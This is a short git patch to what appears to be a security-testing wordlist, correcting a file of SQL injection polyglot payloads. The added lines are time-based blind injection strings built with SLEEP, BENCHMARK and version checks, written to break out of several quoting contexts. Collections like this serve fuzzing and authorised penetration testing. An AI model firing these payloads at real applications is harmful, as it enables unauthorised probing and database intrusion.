From 7b6b7923122dd166eb6baaecb8fb43dc628caccf Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Wed, 21 Mar 2018 16:29:03 +0000
Subject: [PATCH] Close #69 - Fix SQLi Polyglot

Source: https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/

Source: https://twitter.com/SymbianSyMoh/status/707685783801454594
---
 Fuzzing/Polyglots/SQLi-Polyglots.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/Fuzzing/Polyglots/SQLi-Polyglots.txt b/Fuzzing/Polyglots/SQLi-Polyglots.txt
index 4cc9d80..9cf335c 100644
--- a/Fuzzing/Polyglots/SQLi-Polyglots.txt
+++ b/Fuzzing/Polyglots/SQLi-Polyglots.txt
@@ -1,2 +1,3 @@
 SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
-SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample
+SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
+IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/